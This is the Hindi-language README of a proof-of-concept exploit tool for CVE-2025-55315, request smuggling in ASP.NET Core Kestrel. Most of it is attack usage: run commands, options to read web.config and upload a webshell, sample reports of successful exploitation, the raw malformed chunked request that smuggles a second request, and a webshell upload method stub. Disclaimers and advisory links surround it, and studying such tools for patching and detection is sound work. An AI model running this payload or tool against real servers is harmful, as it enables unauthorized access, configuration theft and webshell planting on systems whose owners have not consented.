
CVE-2025-55315 PoC शोषण
ASP.NET Core Kestrel के लिए HTTP अनुरोध तस्करी शोषण उपकरण
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है!
CVE-2025-55315 (ASP.NET Core Kestrel HTTP अनुरोध तस्करी भेद्यता) के लिए व्यावसायिक पैठ परीक्षण उपकरण। यह उपकरण व्यापक शोषण क्षमताओं के साथ एकल-लक्ष्य विश्लेषण के लिए डिज़ाइन किया गया है।
ASP.NET Core Kestrel वेब सर्वर में एक गंभीर HTTP अनुरोध तस्करी भेद्यता (CVSS 9.9/10) जो हमलावरों को अनुमति देती है:
प्रभावित संस्करण:
# Python 3.7 या उच्चतर
python3 --version
# कोई बाहरी निर्भरता नहीं - केवल मानक लाइब्रेरी का उपयोग करता है
# टूल को क्लोन या डाउनलोड करें
git clone https://github.com/ZemarKhos/CVE-2025-55315-PoC-Exploit.git
cd CVE-2025-55315-PoC-Exploit
# निष्पादन योग्य बनाएं
chmod +x cve_2025_55315_PoC.py
python3 cve_2025_55315_PoC.py -t target.com
यह करेगा:
python3 cve_2025_55315_PoC.py -t target.com -e /api/login
python3 cve_2025_55315_PoC.py -t target.com --read-config -o report.txt
python3 cve_2025_55315_PoC.py \
-t target.com \
--read-config \
--upload-shell \
-v \
-o full_report.txt
परिदृश्य: जाँचें कि प्रोडक्शन सर्वर असुरक्षित है या नहीं
python3 cve_2025_55315_PoC.py -t api.mycompany.com
अपेक्षित अवधि: 30-60 सेकंड
परिदृश्य: वर्बोज़ आउटपुट के साथ व्यापक एंडपॉइंट स्कैन
python3 cve_2025_55315_PoC.py -t api.mycompany.com -v -o scan_results.txt
अपेक्षित अवधि: 2-5 मिनट
परिदृश्य: विशिष्ट महत्वपूर्ण एंडपॉइंट का परीक्षण
python3 cve_2025_55315_PoC.py \
-t api.mycompany.com \
-e /api/payment/process \
-e /api/admin/users \
-e /api/internal/config \
-o critical_endpoints.txt
परिदृश्य: आंतरिक HTTP सर्वर का परीक्षण
python3 cve_2025_55315_PoC.py \
-t internal-api.local \
-p 8080 \
--no-ssl
usage: cve_2025_55315_PoC.py [-h] -t TARGET [-p PORT] [-e ENDPOINT]
[--no-ssl] [--read-config] [--upload-shell]
[-o OUTPUT] [-v] [--timeout TIMEOUT]
अनिवार्य तर्क:
-t, --target लक्ष्य होस्टनाम या URL (जैसे, target.com)
वैकल्पिक तर्क:
-p, --port पोर्ट नंबर (डिफ़ॉल्ट: SSL के लिए 443, गैर-SSL के लिए 80)
-e, --endpoint परीक्षण करने के लिए विशिष्ट एंडपॉइंट (एकाधिक बार उपयोग किया जा सकता है)
--no-ssl SSL/HTTPS अक्षम करें (HTTP का उपयोग करें)
--read-config web.config फ़ाइल पढ़ने का प्रयास करें
--upload-shell वेबशेल अपलोड का प्रयास करें (पुष्टि आवश्यक)
-o, --output रिपोर्ट को फ़ाइल में सहेजें
-v, --verbose वर्बोज़ आउटपुट सक्षम करें
--timeout सेकंड में सॉकेट टाइमआउट (डिफ़ॉल्ट: 10)
-h, --help सहायता संदेश दिखाएँ
Target: old-api.company.com:443
Vulnerable: YES - CRITICAL
--- Server Information ---
server: Kestrel/8.0.15
kestrel_detected: True
http_version: 1.1
--- VULNERABLE ENDPOINTS (2) ---
✗ /api/login
Details: Request smuggling successful - multiple responses
✗ /api/health
Details: Request smuggling successful - multiple responses
--- SUCCESSFUL EXPLOITS ---
✓ web.config_read via /api/login
व्याख्या:
Target: new-api.company.com:443
Vulnerable: NO - SECURE
--- Server Information ---
server: Kestrel/9.0.10
kestrel_detected: True
http_version: 1.1
[SUCCESS] ✓ Endpoint NOT vulnerable (400 Bad Request)
✓ No vulnerable endpoints found - target may be patched
व्याख्या:
यह उपकरण चलाने से पहले, सुनिश्चित करें:
यह उपकरण दुर्भावनापूर्ण चंकड ट्रांसफर एन्कोडिंग का उपयोग करके CVE-2025-55315 का शोषण करता है:
POST /endpoint HTTP/1.1
Host: target.com
Transfer-Encoding: chunked
2;\n ← भेद्यता: \r\n के बजाय अकेला \n
XX
0\r\n
\r\n
GET /smuggled HTTP/1.1 ← यह एक अलग अनुरोध बन जाता है
Host: target.com
यह क्यों काम करता है:
\n को लाइन टर्मिनेटर के रूप में देखता है → इसे एकल अनुरोध के रूप में संसाधित करता है\n को अनदेखा करता है → तस्करी किए गए GET को एक अलग अनुरोध के रूप में मानता है| सर्वर प्रतिक्रिया | व्याख्या | स्थिति |
|---|---|---|
400 Bad Request | Kestrel ने दुर्भावनापूर्ण चंक को अस्वीकार कर दिया | ✅ सुरक्षित (पैच किया गया) |
एकाधिक HTTP/1.1 | दो अलग-अलग प्रतिक्रियाएँ प्राप्त हुईं | ❌ असुरक्षित |
500 या 502 | आंतरिक सर्वर त्रुटि | ⚠️ संभावित रूप से असुरक्षित |
सामान्य 200 OK | अनुरोध स्वीकार किया गया | ⚠️ अनिर्णायक |
[ERROR] Connection failed: [Errno 111] Connection refused
समाधान:
ping target.com--no-ssl[ERROR] Connection failed: certificate verify failed
समाधान: टूल पहले से ही प्रमाणपत्र सत्यापन अक्षम कर देता है। यदि समस्या बनी रहती है:
export PYTHONHTTPSVERIFY=0
python3 cve_2025_55315_PoC.py -t target.com
[WARNING] No response - possible timeout
समाधान:
--timeout 30[WARNING] Upload blocked (forbidden/method not allowed)
स्पष्टीकरण:
यह सामान्य है - सभी असुरक्षित सिस्टम फ़ाइल अपलोड की अनुमति नहीं देते।
Microsoft सुरक्षा सलाह: https://github.com/dotnet/aspnetcore/issues/64033
NVD डेटाबेस: https://nvd.nist.gov/vuln/detail/CVE-2025-55315
प्रेटोरियन अनुसंधान ($10k बग बाउंटी): https://www.praetorian.com/blog/how-i-found-the-worst-asp-net-vulnerability-a-10k-bug-cve-2025-55315/
एंड्रयू लॉक का तकनीकी विश्लेषण: https://andrewlock.net/understanding-the-worst-dotnet-vulnerability-request-smuggling-and-cve-2025-55315/
PortSwigger अनुसंधान: https://portswigger.net/web-security/request-smuggling
OWASP: https://owasp.org/www-community/attacks/HTTP_Request_Smuggling
स्क्रिप्ट में COMMON_ENDPOINTS संपादित करें:
COMMON_ENDPOINTS = [
'/your/custom/endpoint',
'/api/myapp/admin',
# अपने एंडपॉइंट यहाँ जोड़ें
]
upload_webshell() विधि संशोधित करें:
def upload_webshell(self, endpoint: str = '/', shell_path: str = '/shell.aspx',
shell_content: str = None):
if not shell_content:
shell_content = '''
<!-- आपका कस्टम ASPX वेबशेल यहाँ -->
'''
यदि आपको बग मिलते हैं या सुझाव हैं:
-v-o debug.txtयह उपकरण "जैसा है" केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण
उद्देश्यों के लिए प्रदान किया जाता है।
लेखक:
❌ अवैध गतिविधियों का समर्थन नहीं करते
❌ दुरुपयोग के लिए जिम्मेदार नहीं हैं
❌ किसी भी क्षति के लिए उत्तरदायी नहीं हैं
❌ कानूनी सलाह प्रदान नहीं करते
इस उपकरण का उपयोग करके आप सहमत हैं:
✅ केवल अधिकृत सिस्टम पर उपयोग करने के लिए
✅ पूर्ण कानूनी जिम्मेदारी स्वीकार करने के लिए
✅ सभी लागू कानूनों का पालन करने के लिए
✅ नैतिक हैकिंग सिद्धांतों का पालन करने के लिए
अनधिकृत उपयोग सख्ती से प्रतिबंधित और अवैध है!
यह उपकरण निम्नलिखित के लिए बनाया गया था:
निम्नलिखित के लिए नहीं:
केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण
यह उपकरण शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है। व्यावसायिक उपयोग, पुनर्वितरण, या दुर्भावनापूर्ण उद्देश्यों के लिए उपयोग सख्त वर्जित है।
╔═════════════════════════════════════════════════════════════╗
║ ║
║ इस उपकरण का जिम्मेदारीपूर्वक और कानूनी रूप से उपयोग करें! ║
║ ║
║ कंप्यूटर सिस्टम तक अनधिकृत पहुंच एक अपराध है। ║
║ परीक्षण से पहले हमेशा लिखित अनुमति प्राप्त करें। ║
║ जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें। ║
║ ║
║ खुश (कानूनी) हैकिंग! ║
║ ║
╚═════════════════════════════════════════════════════════════╝